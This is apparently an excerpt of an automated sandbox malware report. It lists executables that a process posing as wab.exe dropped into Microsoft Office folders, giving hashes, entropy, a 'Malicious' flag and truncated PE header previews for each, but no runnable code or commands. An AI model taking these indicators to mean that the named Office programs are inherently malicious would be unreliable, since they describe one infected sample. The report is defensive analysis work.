                                                                              SHA-512:40FF7E018B6EE45F1C16736F692347B1BD7B29D809651AD4F95C8AEB4EB949743E9701ABF1DA31D8ACA34276985A554DFA39EECB6033C569EDFEF500A0302DE6
                                                                              Malicious:true
                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........D.............................................................%.............Rich....................PE..L....X8..................*..........00.......@....@..........................0......t.....@...... ..........................4Q.......p....................... ......0...T...................|........................P..0....8..@....................text....(.......*.................. ..`.data........@......................@....idata.......P.......0..............@..@.didat.......`.......:..............@....rsrc........p.......<..............@..@.reloc....... ......................@..B........................................................................................................................................................................................................................................................................................

                                                                              C:\Program Files (x86)\Microsoft Office\root\Integration\Integrator.exe

                                                                              Download File
                                                                              Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                              Category:dropped
                                                                              Size (bytes):4473576
                                                                              Entropy (8bit):6.558895341897284
                                                                              Encrypted:false
                                                                              SSDEEP:98304:/kkCqyDEY7+o3OBvfGVY+40yajyS+9s/pLOq:/kkCqaE68eV+0y8E6L1
                                                                              MD5:4855130B5C1085421920C85105178634
                                                                              SHA1:A33353F42A13A7250D66326F8770A286E5774729
                                                                              SHA-256:8624CD3947C884673C1090CCED557CDAC8075E120C1EB2EF4B9C01B694370AFA
                                                                              SHA-512:97D9889F9385DB775A685A62A52EC371BDEE291ECF4877DF0A6098F01F6BD5226452B3893C002A2914B9AE511837FF8090E6DB297C0CDFE3FADBE49A6101CFE6
                                                                              Malicious:true
                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........D.............................................................%.............Rich....................PE..L....X8..................*..........00.......@....@..........................0......t.....@...... ..........................4Q.......p....................... ......0...T...................|........................P..0....8..@....................text....(.......*.................. ..`.data........@......................@....idata.......P.......0..............@..@.didat.......`.......:..............@....rsrc........p.......<..............@..@.reloc....... ......................@..B........................................................................................................................................................................................................................................................................................

                                                                              C:\Program Files (x86)\Microsoft Office\root\Office16\ACCICONS.EXE

                                                                              Download File
                                                                              Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                              Category:dropped
                                                                              Size (bytes):4316096
                                                                              Entropy (8bit):3.9033569901477474
                                                                              Encrypted:false
                                                                              SSDEEP:98304:9PNLniBaEJhRELqS/rhwov59SRZ5Vb9sybbsK+0rnsQ:JNLniBPJhRELqS/rhb59SRZ5Vb9sybb9
                                                                              MD5:A5CA18C848C5701C8854BB35BD56574A
                                                                              SHA1:005BF3164DF9CA7270124E3AF626845CFE1D09E8
                                                                              SHA-256:FD61D8809B0673D3B2E54A167F82F37B5345CD65285FACC8DA6C9EAFD6AD4524
                                                                              SHA-512:DEEF87CC41230B4888A7E0937C8A918B61186372B9ABE36069507C2E5B64976EE74439CA136907AFE11C23B737E8134E342F51412558B3E6CDA4A80610A1DE0E
                                                                              Malicious:true
                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........D.............................................................%.............Rich....................PE..L....X8..................*..........00.......@....@..........................0......t.....@...... ..........................4Q.......p....................... ......0...T...................|........................P..0....8..@....................text....(.......*.................. ..`.data........@......................@....idata.......P.......0..............@..@.didat.......`.......:..............@....rsrc........p.......<..............@..@.reloc....... ......................@..B........................................................................................................................................................................................................................................................................................

                                                                              C:\Program Files (x86)\Microsoft Office\root\Office16\ADDINS\Microsoft Power Query for Excel Integrated\bin\Microsoft.Mashup.Container.Loader.exe

                                                                              Download File
                                                                              Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                              Category:dropped
                                                                              Size (bytes):94600
                                                                              Entropy (8bit):5.808950203405244
                                                                              Encrypted:false
                                                                              SSDEEP:1536:sEl9bbS3VozELjOzHKd1XI/etzCJQx0cxnIO/IOmOe:/rkaE/OTKXI/etG8ICILJ
                                                                              MD5:92CCB6717B855AAB9FC8F2DD5704DF9E
                                                                              SHA1:A992665A3EED482629E382BA98CC00D29BD96B08
                                                                              SHA-256:7C5D9FF38A44CC39E7023D44A89B1B2F7CE3EDD4C7292C89E82018319BE3CF9B
                                                                              SHA-512:B267F5DB062B05E844D0AC159040CD2BC88257E05B47E70275AD3629DC0331CD53E113D0F4CF6E7105551F13D5DF3C8EBE1CA05E519D84DDD9FA523AE730C8C5
                                                                              Malicious:true
                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........D.............................................................%.............Rich....................PE..L....X8..................*..........00.......@....@..........................0......t.....@...... ..........................4Q.......p....................... ......0...T...................|........................P..0....8..@....................text....(.......*.................. ..`.data........@......................@....idata.......P.......0..............@..@.didat.......`.......:..............@....rsrc........p.......<..............@..@.reloc....... ......................@..B........................................................................................................................................................................................................................................................................................

                                                                              C:\Program Files (x86)\Microsoft Office\root\Office16\AppSharingHookController.exe

                                                                              Download File
                                                                              Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                              Category:dropped
                                                                              Size (bytes):101496
                                                                              Entropy (8bit):5.614417533237859
                                                                              Encrypted:false
                                                                              SSDEEP:1536:sEl9bbS3VoDvpz3ktxGvpzvy5ZWGalHFmMTK0KRTS8bOzc:/rk2ToATzvmN0KRm8bOzc
                                                                              MD5:7F19345545B8DA667991DEEC3D8F6468
                                                                              SHA1:66EC1140DD4F3811E4E000E94340469CE42108B4
                                                                              SHA-256:FD49A52DE21C968484C90DEFEBE9B41A900C0C83D0578B931FFF41A02F6041B3
                                                                              SHA-512:898F2CCF7F289256A57278D79B9D9F0AFBAE6AEC3761404D00A3C1B98E0467188F33B6C4B0B19CC687DFEEFC2408F4A5D3C3D4FD3BAFA4FE258E922CFC52A76C
                                                                              Malicious:true
                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........D.............................................................%.............Rich....................PE..L....X8..................*..........00.......@....@..........................0......t.....@...... ..........................4Q.......p....................... ......0...T...................|........................P..0....8..@....................text....(.......*.................. ..`.data........@......................@....idata.......P.......0..............@..@.didat.......`.......:..............@....rsrc........p.......<..............@..@.reloc....... ......................@..B........................................................................................................................................................................................................................................................................................

                                                                              C:\Program Files (x86)\Microsoft Office\root\Office16\CLVIEW.EXE

                                                                              Download File
                                                                              Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                              Category:dropped
                                                                              Size (bytes):455760
                                                                              Entropy (8bit):5.80402506379432
                                                                              Encrypted:false
                                                                              SSDEEP:6144:cwACThwS0vn9IdRsLGEJTdPA6lDfZNAGVx:cwACThwSSn2dRANtlF3j
                                                                              MD5:3B0A8B5E4045F2972D8139D1EB68FF5D
                                                                              SHA1:91653217660FF749728075DFCDD7DD3935D6DD07
                                                                              SHA-256:795757B494CE9CF653E25E61512370283B0DCE892F0FA4AD641CE5353BB2E9D7
                                                                              SHA-512:EBA564D4D158CD2FDBA10A915D2837958EAD114E0A71F31AECDE8BC54A1EBAFE305279A90429D98A7BB6214623D667C704A31B2E788EE974EADB02E0FDB9CEE4
                                                                              Malicious:true
                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........D.............................................................%.............Rich....................PE..L....X8..................*..........00.......@....@..........................0......t.....@...... ..........................4Q.......p....................... ......0...T...................|........................P..0....8..@....................text....(.......*.................. ..`.data........@......................@....idata.......P.......0..............@..@.didat.......`.......:..............@....rsrc........p.......<..............@..@.reloc....... ......................@..B........................................................................................................................................................................................................................................................................................

                                                                              C:\Program Files (x86)\Microsoft Office\root\Office16\CNFNOT32.EXE

                                                                              Download File
                                                                              Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                              Category:dropped
                                                                              Size (bytes):225704
                                                                              Entropy (8bit):5.993164766056159
                                                                              Encrypted:false
                                                                              SSDEEP:3072:/rkRLqB8edYkIrv6TXRw9xwqazULDjkAJZo0RAjUIqXfkRC:mjilq8OPwRzso6AQ5yC
                                                                              MD5:978D692068FFF1979AA85A22C7774B82
                                                                              SHA1:3356A00B00B04A3DEB7DB995C45990D0C2C99947
                                                                              SHA-256:0402398E41C93D6925AD34ED076C935E32A0D3437F04621A40A1B36AD83E9855
                                                                              SHA-512:8410502EB44D2FC186609AC25F29796475F0FCA44688D3266C95FC09FCB350A9ACF7B247797FD9CE71EE4A5D8CCC6F0F32DCFFDA2D5FC5626C7D4C3B6539FD28
                                                                              Malicious:true
                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........D.............................................................%.............Rich....................PE..L....X8..................*..........00.......@....@..........................0......t.....@...... ..........................4Q.......p....................... ......0...T...................|........................P..0....8..@....................text....(.......*.................. ..`.data........@......................@....idata.......P.......0..............@..@.didat.......`.......:..............@....rsrc........p.......<..............@..@.reloc....... ......................@..B........................................................................................................................................................................................................................................................................................

                                                                              C:\Program Files (x86)\Microsoft Office\root\Office16\DCF\Common.DBConnection.exe

                                                                              Download File
                                                                              Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                              Category:dropped
                                                                              Size (bytes):84928
                                                                              Entropy (8bit):5.709408438671853
                                                                              Encrypted:false
                                                                              SSDEEP:1536:sEl9bbS3VoY67wZClMML07MiapFmPRHyzMwzobtM+zf:/rkN67wZClMMQ7MiawHyzMwsL
                                                                              MD5:322701BC6FF92F3789B1C9105C11F393
                                                                              SHA1:16B5BE10FE983EA904C06891581F127C03915C41
                                                                              SHA-256:6097218FB5318A7671C154F5D06BCB888296D7BD5E301F6DC3D73363CBEF9713
                                                                              SHA-512:6549D7DECCDE4489BC04508E562372B94F834EEAEFBAFCF8FB65B600FDF13338AFAA47F9412DC886E38B7E782DBF464AFE37847C4CBB75C3D88759F17AD08208
                                                                              Malicious:true
                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........D.............................................................%.............Rich....................PE..L....X8..................*..........00.......@....@..........................0......t.....@...... ..........................4Q.......p....................... ......0...T...................|........................P..0....8..@....................text....(.......*.................. ..`.data........@......................@....idata.......P.......0..............@..@.didat.......`.......:..............@....rsrc........p.......<..............@..@.reloc....... ......................@..B........................................................................................................................................................................................................................................................................................

                                                                              C:\Program Files (x86)\Microsoft Office\root\Office16\DCF\Common.DBConnection64.exe

                                                                              Download File
                                                                              Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                              Category:dropped
                                                                              Size (bytes):83816
                                                                              Entropy (8bit):5.759188593692372
                                                                              Encrypted:false
                                                                              SSDEEP:1536:sEl9bbS3VoP0s7wZClMML072apFmPcnGzLHyxz5pOEtmwxz5E:/rkat7wZClMMQ72ahnGzextQyxtE
                                                                              MD5:9D3499779ECEF0A457BB315144B20EFC
                                                                              SHA1:F144F384645733E14C1D1923241135D6CD9DA04B
                                                                              SHA-256:A2A2F6C89369BB6F130D363510E05964829C18F9B928D7836628051C06233675
                                                                              SHA-512:FEB9CB23D90149AD2CC9EB037B5B9DD810070863EBB3D5787B6BA84C6F98ED496C19201EFCBC0C4A23F835497A4A789E0824FDEA1840D728D334CF240EF38D15
                                                                              Malicious:true
                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........D.............................................................%.............Rich....................PE..L....X8..................*..........00.......@....@..........................0......t.....@...... ..........................4Q.......p....................... ......0...T...................|........................P..0....8..@....................text....(.......*.................. ..`.data........@......................@....idata.......P.......0..............@..@.didat.......`.......:..............@....rsrc........p.......<..............@..@.reloc....... ......................@..B........................................................................................................................................................................................................................................................................................

                                                                              C:\Program Files (x86)\Microsoft Office\root\Office16\DCF\DATABASECOMPARE.EXE

                                                                              Download File
                                                                              Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                              Category:dropped
                                                                              Size (bytes):233832
                                                                              Entropy (8bit):6.144128303355593
                                                                              Encrypted:false
                                                                              SSDEEP:3072:/rkGW32GhNvMQ/58sl2U2Gszlz4SNBZCgMWku:g2GhN0lsdspzPgg1
                                                                              MD5:D932FC7F938D7FAA076BDF0F32C1C14C
                                                                              SHA1:289A2046B00A40433ED38C2E87BDB29EBF58D63E
                                                                              SHA-256:FCC50AE05512C451B0F9C0C89582C0F8411C1A52A99F1C51AD39902478BE59E4
                                                                              SHA-512:DF559DBD4E0918B205C94F2BE0361C7FD50BC9431AF41A90EAB35743B288EA208F658799E0CA96D29892D6A89A9F5A37DE6DB5684B898526F39B0AE46A8F9C4A
                                                                              Malicious:true
                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........D.............................................................%.............Rich....................PE..L....X8..................*..........00.......@....@..........................0......t.....@...... ..........................4Q.......p....................... ......0...T...................|........................P..0....8..@....................text....(.......*.................. ..`.data........@......................@....idata.......P.......0..............@..@.didat.......`.......:..............@....rsrc........p.......<..............@..@.reloc....... ......................@..B........................................................................................................................................................................................................................................................................................

                                                                              C:\Program Files (x86)\Microsoft Office\root\Office16\DCF\SPREADSHEETCOMPARE.EXE

                                                                              Download File
                                                                              Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                              Category:dropped
                                                                              Size (bytes):502632
                                                                              Entropy (8bit):6.587262136505295
                                                                              Encrypted:false
                                                                              SSDEEP:6144:RWDxGH79J2VX5gEpvm7JA8I6BHAlSpFG/+Ls3ze30xB7zq2zs:2MxCvm7JK6JAB/6N30xpI
                                                                              MD5:097728BC9E3AD3C6955B58A1CCB73D23
                                                                              SHA1:832DDD4349D69A41DC22131C341094A55742EE68
                                                                              SHA-256:1D19D526CB1E90C4C0553E74ED0DD07996AA9379764D76FAFFA2C8394A8BF81D
                                                                              SHA-512:DAE8E3CC44495E9A3FD45AA4DA02123DEE714AF06E88DAEAA8FC4F03CAD53B07CF3DB47F90C95E01CF65F2B045F9BE6F8CEF15908224226EE7C54E902519C77A
                                                                              Malicious:true
                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........D.............................................................%.............Rich....................PE..L....X8..................*..........00.......@....@..........................0......t.....@...... ..........................4Q.......p....................... ......0...T...................|........................P..0....8..@....................text....(.......*.................. ..`.data........@......................@....idata.......P.......0..............@..@.didat.......`.......:..............@....rsrc........p.......<..............@..@.reloc....... ......................@..B........................................................................................................................................................................................................................................................................................

                                                                              C:\Program Files (x86)\Microsoft Office\root\Office16\DCF\filecompare.exe

                                                                              Download File
                                                                              Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                              Category:dropped
                                                                              Size (bytes):352704
                                                                              Entropy (8bit):6.234328618673098
                                                                              Encrypted:false
                                                                              SSDEEP:6144:TEshacHeGXduZtZ9zHVcI3uv7FgR3FTzWQ/ZZyp1:IsHHrtuZtPvh3FuQ/jyp1
                                                                              MD5:23DBC58CDF96B3DC8D931BCBCD1F0259
                                                                              SHA1:C771539F3FA9F1AF9A9E9D6F257A9A3C5317772E
                                                                              SHA-256:63DB8B997CB7CDCAC4360929C5998A232B9A429DDD74A88EEAEB8AAA29D24474
                                                                              SHA-512:CDD9152B00EA205E0238FD7997FD96B2CF0718E7290630718B1128998F80E9F0E3C347DE1C476AAB67DC7E09BC8CA816CA39D321D85BB03DACF06269C9F5F169
                                                                              Malicious:true
                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........D.............................................................%.............Rich....................PE..L....X8..................*..........00.......@....@..........................0......t.....@...... ..........................4Q.......p....................... ......0...T...................|........................P..0....8..@....................text....(.......*.................. ..`.data........@......................@....idata.......P.......0..............@..@.didat.......`.......:..............@....rsrc........p.......<..............@..@.reloc....... ......................@..B........................................................................................................................................................................................................................................................................................

                                                                              C:\Program Files (x86)\Microsoft Office\root\Office16\GRAPH.EXE

                                                                              Download File
                                                                              Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                              Category:dropped
                                                                              Size (bytes):4395184
                                                                              Entropy (8bit):5.9241413364591375
                                                                              Encrypted:false
                                                                              SSDEEP:98304:cXuo5RMru45b5dZlAj0sqW7YDKMzVwgBWMTwLe7G:OR345NRAgsr7QH6h93
                                                                              MD5:6B5846BC42DB676458124E9B64BEF429
                                                                              SHA1:764B0FC6F01544F8E39BBEE16E55B5A1ADFDB014
                                                                              SHA-256:CEE14668777B06EAB589D4D29A9510B89A0A0D62DACFD2FED1CEC7ACFD66960E
                                                                              SHA-512:34257DCA4FFE6CE8C402F9E065DF582B4E221E14D3AFE622909B0AE48C80CCB212378B7437B5FF78E013B995F712B0BE79902500343CFE46D7F6127AA584090F
                                                                              Malicious:true
                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........D.............................................................%.............Rich....................PE..L....X8..................*..........00.......@....@..........................0......t.....@...... ..........................4Q.......p....................... ......0...T...................|........................P..0....8..@....................text....(.......*.................. ..`.data........@......................@....idata.......P.......0..............@..@.didat.......`.......:..............@....rsrc........p.......<..............@..@.reloc....... ......................@..B........................................................................................................................................................................................................................................................................................

                                                                              C:\Program Files (x86)\Microsoft Office\root\Office16\IEContentService.exe

                                                                              Download File
                                                                              Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                              Category:dropped
                                                                              Size (bytes):603928
                                                                              Entropy (8bit):6.447229278008163
                                                                              Encrypted:false
                                                                              SSDEEP:12288:hzKRgqBDxoiPCLXHLuk/Wg4Reh2mbeF+IGboJdx:hKgMxoiPoXruPi/++IvJdx
                                                                              MD5:8EF30B3A7AEB63420B6DD95D081D9046
                                                                              SHA1:871F1B5483B0487627DEADBC7316C8B9440042E8
                                                                              SHA-256:B1C572271C709039685AE45086A1D3B57EE8F31D6A9030C6F47DAAF2551A6449
                                                                              SHA-512:B5A9A27D83F5D4F5169DAA58D348C855ACDD37C8D05436F1B63725517E8C0ABB637181CC569DDDBF8EF1603F5143EF844577E1DC664405033F20E2156445E984
                                                                              Malicious:true
                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........D.............................................................%.............Rich....................PE..L....X8..................*..........00.......@....@..........................0......t.....@...... ..........................4Q.......p....................... ......0...T...................|........................P..0....8..@....................text....(.......*.................. ..`.data........@......................@....idata.......P.......0..............@..@.didat.......`.......:..............@....rsrc........p.......<..............@..@.reloc....... ......................@..B........................................................................................................................................................................................................................................................................................

                                                                              C:\Program Files (x86)\Microsoft Office\root\Office16\MSOHTMED.EXE

                                                                              Download File
                                                                              Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                              Category:dropped
                                                                              Size (bytes):507024
                                                                              Entropy (8bit):6.027052491483809
                                                                              Encrypted:false
                                                                              SSDEEP:6144:GyrmBq0RYSv3A5DhW15yChMFt2XTNJWLgCWzzYhPRt+:nrmBjYuALWJMn2XTmL7hPH+
                                                                              MD5:6C2D19BFA4446F763A05A97156FBF558
                                                                              SHA1:F08182FA8F68EACB2E906C7627811D490CBD7D14
                                                                              SHA-256:5234568C60B2F49995703548666C8A2DCD7745019122D29DAC1020EA19CE161C
                                                                              SHA-512:57AF1362D3422B04AF1CF245A4FD2A1089D024FC679659FBA5F892E1CDCF984F8E6F8652690FA5A9A799DA2B722474B61AE6C32C7CD7A330173EB6D3AD032675
                                                                              Malicious:true
                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........D.............................................................%.............Rich....................PE..L....X8..................*..........00.......@....@..........................0......t.....@...... ..........................4Q.......p....................... ......0...T...................|........................P..0....8..@....................text....(.......*.................. ..`.data........@......................@....idata.......P.......0..............@..@.didat.......`.......:..............@....rsrc........p.......<..............@..@.reloc....... ......................@..B........................................................................................................................................................................................................................................................................................

                                                                              C:\Program Files (x86)\Microsoft Office\root\Office16\MSOSREC.EXE

                                                                              Download File
                                                                              Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                              Category:dropped
                                                                              Size (bytes):251560
                                                                              Entropy (8bit):6.413231422944333
                                                                              Encrypted:false
                                                                              SSDEEP:6144:momAAOwPcPIqk4Vsvt0uews+qZP9zOPBxGiryKI:msAETlVsKzZPixGBKI
                                                                              MD5:4D9D18E2B09F2435D61B77935C0A7664
                                                                              SHA1:3C0B98D91076BA322485390558E474CF933CD146
                                                                              SHA-256:8677F97FE78DD2916AB1DFDBCB98FB08652D80F81C4C8FF5EE1C3F8EF3F93051
                                                                              SHA-512:09393D9CF957E93D3D2B1D747C524C7208A7A404A17BA94B2E0B462632CE03CA2804770B2C670BACEA5C8CBF179CCDE11888670083B99964B4A998CB9B13250F
                                                                              Malicious:true
                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........D.............................................................%.............Rich....................PE..L....X8..................*..........00.......@....@..........................0......t.....@...... ..........................4Q.......p....................... ......0...T...................|........................P..0....8..@....................text....(.......*.................. ..`.data........@......................@....idata.......P.......0..............@..@.didat.......`.......:..............@....rsrc........p.......<..............@..@.reloc....... ......................@..B........................................................................................................................................................................................................................................................................................

                                                                              C:\Program Files (x86)\Microsoft Office\root\Office16\MSQRY32.EXE

                                                                              Download File
                                                                              Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                              Category:dropped
                                                                              Size (bytes):751720
                                                                              Entropy (8bit):6.572900922542691
                                                                              Encrypted:false
                                                                              SSDEEP:12288:xdI8PdgELg6eaBlnjlZcTerWv+xdeFhvCs9TukINOW:xa8PWELTBlZ+erw+xdeFUsUkEh
                                                                              MD5:6900C008B34CBCC5A50AA56C83EEB3DD
                                                                              SHA1:9CD9B4CE42AAD96B998FAC22B0F125D70AD2E5FC
                                                                              SHA-256:21119A1B53F614118699759D944278DFFD5DE92D285B7250E05E5BB42C444D7C
                                                                              SHA-512:D41AAF60C3E1A7F7FF972457DF8C5031E7CF133B894AD467D100ED66D342CD893BBA87E9F0397E35F3A3D6690DF19E324B6B029DA20B13981D51485860CB6CDC
                                                                              Malicious:true
                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........D.............................................................%.............Rich....................PE..L....X8..................*..........00.......@....@..........................0......t.....@...... ..........................4Q.......p....................... ......0...T...................|........................P..0....8..@....................text....(.......*.................. ..`.data........@......................@....idata.......P.......0..............@..@.didat.......`.......:..............@....rsrc........p.......<..............@..@.reloc....... ......................@..B........................................................................................................................................................................................................................................................................................

                                                                              C:\Program Files (x86)\Microsoft Office\root\Office16\NAMECONTROLSERVER.EXE

                                                                              Download File
                                                                              Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                              Category:dropped
                                                                              Size (bytes):161968
                                                                              Entropy (8bit):6.179397526086976
                                                                              Encrypted:false
                                                                              SSDEEP:3072:/rkbNDS5lS5jITI1FeBT77NDS5lS3j+Wzy6oUSA7hZ:QNDS5lSlFeBTfNDS5lS7zUrsZ
                                                                              MD5:2D46116FB35E1B827866BFD7581347AA
                                                                              SHA1:CB5966248987F82189124B1782F84068F75B9B15
                                                                              SHA-256:6406E08D3292F2A72548F766EC5ABEC2AD7DB3E4D8A42F7F33AC56ADFFA487C3
                                                                              SHA-512:A87CE9F9E76E98655EA7310466E314FAF5CC98E3AF8B46E2E2908294A3995027960D4BD42356FD2F7019B71055512937565A1DE375DEB4111D052B2F30C42641
                                                                              Malicious:true
                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........D.............................................................%.............Rich....................PE..L....X8..................*..........00.......@....@..........................0......t.....@...... ..........................4Q.......p....................... ......0...T...................|........................P..0....8..@....................text....(.......*.................. ..`.data........@......................@....idata.......P.......0..............@..@.didat.......`.......:..............@....rsrc........p.......<..............@..@.reloc....... ......................@..B........................................................................................................................................................................................................................................................................................

                                                                              C:\Program Files (x86)\Microsoft Office\root\Office16\OLCFG.EXE

                                                                              Download File
                                                                              Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                              Category:dropped
                                                                              Size (bytes):159560
                                                                              Entropy (8bit):6.228746819324478
                                                                              Encrypted:false
                                                                              SSDEEP:3072:/rk+klWPsom9TiWWWWWWWQM+FtWAzhIwaeENinkf8xw3xUFv2tGPrtPmF:Bb5zPaNQnBxw34Oita
                                                                              MD5:1E2398318A0110A81DAAECBE4A1020C2
                                                                              SHA1:DEB0A629A1BEFE2059CA8195A55BFB31EB18C557
                                                                              SHA-256:32F7146C09BF7270AE036DD8AEC6C398B9611D1D00CA131BE697BA65A1BD4A3F
                                                                              SHA-512:C9616CBE33AF9C57C5D918953592388376F7114DDF37F8C9AE4F834420F627CA4F1F89159DA02F5AF6D029CD60549490B99D45627A7F39E06CD250CA840F66EB
                                                                              Malicious:true
                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........D.............................................................%.............Rich....................PE..L....X8..................*..........00.......@....@..........................0......t.....@...... ..........................4Q.......p....................... ......0...T...................|........................P..0....8..@....................text....(.......*.................. ..`.data........@......................@....idata.......P.......0..............@..@.didat.......`.......:..............@....rsrc........p.......<..............@..@.reloc....... ......................@..B........................................................................................................................................................................................................................................................................................

                                                                              C:\Program Files (x86)\Microsoft Office\root\Office16\ONENOTE.EXE

                                                                              Download File
                                                                              Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                              Category:dropped
                                                                              Size (bytes):2233240
                                                                              Entropy (8bit):6.273525911634119
                                                                              Encrypted:false
                                                                              SSDEEP:24576:FDZgOA74U4o//sbtwvZTqFDk9sg71SmY90gh/G7QJoma+9duNGeVG29H:FqHVhTr5UmY90sGE5dIDG29H
                                                                              MD5:1BCB6735406FB145CADA541083819C2B
                                                                              SHA1:3CFD31C066860F804E658DBB76CF6CE14D342A24
                                                                              SHA-256:4D7B34ED22D207B0BD737C7CAF2137DBC2F3C47BAE9E753DDD02EC5072FEC989
                                                                              SHA-512:3F533C971AB5824DD75FA8D035503BD12F30D5099C0AA6F8CEB08429EE91B703CCDDC4A2A3442B850C057945A176F1A2B4F6D20FF259A682D285822A12CFB5DD
                                                                              Malicious:true
                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........D.............................................................%.............Rich....................PE..L....X8..................*..........00.......@....@..........................0......t.....@...... ..........................4Q.......p....................... ......0...T...................|........................P..0....8..@....................text....(.......*.................. ..`.data........@......................@....idata.......P.......0..............@..@.didat.......`.......:..............@....rsrc........p.......<..............@..@.reloc....... ......................@..B........................................................................................................................................................................................................................................................................................

                                                                              C:\Program Files (x86)\Microsoft Office\root\Office16\ONENOTEM.EXE

                                                                              Download File
                                                                              Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                              Category:dropped
                                                                              Size (bytes):214432
                                                                              Entropy (8bit):5.707538571611537
                                                                              Encrypted:false
                                                                              SSDEEP:3072:/rkeVFptXofXXXXXXuh9gLzltw6Q1hqOJHrtTh:rtXofXXXXXXASLzb9uhqK
                                                                              MD5:9FA79F3FD29775D061E8E14C460E4C66
                                                                              SHA1:57859E5326791527692F5F825DC0ECD2670A1FBC
                                                                              SHA-256:F9FFA9E69AAA1A753087479D138A0FF14CF3C74F32FECD1659C29CCEF77F5ACB
                                                                              SHA-512:EBEEE5EC5199BB7F0B09D89D033C351797905C242CF9B73F26A69AFBD079D19B9EBA8AA6AE3319E3E0FC49FFBB8916D3D2EC3376A117A5E73F47EB27AF4D2744
                                                                              Malicious:true
                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........D.............................................................%.............Rich....................PE..L....X8..................*..........00.......@....@..........................0......t.....@...... ..........................4Q.......p....................... ......0...T...................|........................P..0....8..@....................text....(.......*.................. ..`.data........@......................@....idata.......P.......0..............@..@.didat.......`.......:..............@....rsrc........p.......<..............@..@.reloc....... ......................@..B........................................................................................................................................................................................................................................................................................

                                                                              C:\Program Files (x86)\Microsoft Office\root\Office16\ORGCHART.EXE

                                                                              Download File
                                                                              Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                              Category:dropped
                                                                              Size (bytes):620840
                                                                              Entropy (8bit):6.51363323895205
                                                                              Encrypted:false
                                                                              SSDEEP:12288:soBdI/BUQtsfBCegl2eccL1q/xRyye7BfcwqEhDe:soM/BB0Bml2m1q/xRPCcwFC
                                                                              MD5:ED4493E7B083EC9BE4A475763BFF5F33
                                                                              SHA1:47A57367C50E528213DA802D54C6C4C8B310C8DC
                                                                              SHA-256:13A1EAF65B046FEA9BC73895CC572D9DA0062DC55636931C5F9AC5379636A581
                                                                              SHA-512:95DFC4770836D252B0FE9637E1F320D62DAF1C0965795F13E93D8C75BF704D70C754A199E687BFF655AD4A1CD1F998CAF2B9F552E4280E090927B030FBF19A1B
                                                                              Malicious:true
